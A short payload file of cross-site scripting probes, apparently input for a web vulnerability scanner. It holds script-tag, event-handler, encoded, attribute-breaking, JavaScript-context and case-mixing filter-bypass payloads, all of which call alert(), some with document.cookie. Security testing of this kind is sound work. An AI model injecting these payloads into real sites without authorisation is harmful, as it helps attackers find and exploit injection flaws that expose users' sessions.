# Custom XSS Payloads
# Lines starting with # are comments and will be ignored
# One payload per line

# Basic payloads
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>

# Event handlers
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
<input onfocus=alert('XSS') autofocus>

# Encoded payloads
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;('XSS')>
%3Cscript%3Ealert('XSS')%3C/script%3E


# Attribute breaking
"><script>alert('XSS')</script>
'><script>alert('XSS')</script>
" onclick=alert('XSS')//

# JavaScript context
</script><script>alert('XSS')</script>
';alert('XSS');//
";alert("XSS");//

# Filter bypass
<ScRiPt>alert('XSS')</sCrIpT>
<IMG SRC=x ONERROR=alert('XSS')>

# Your custom payloads below:
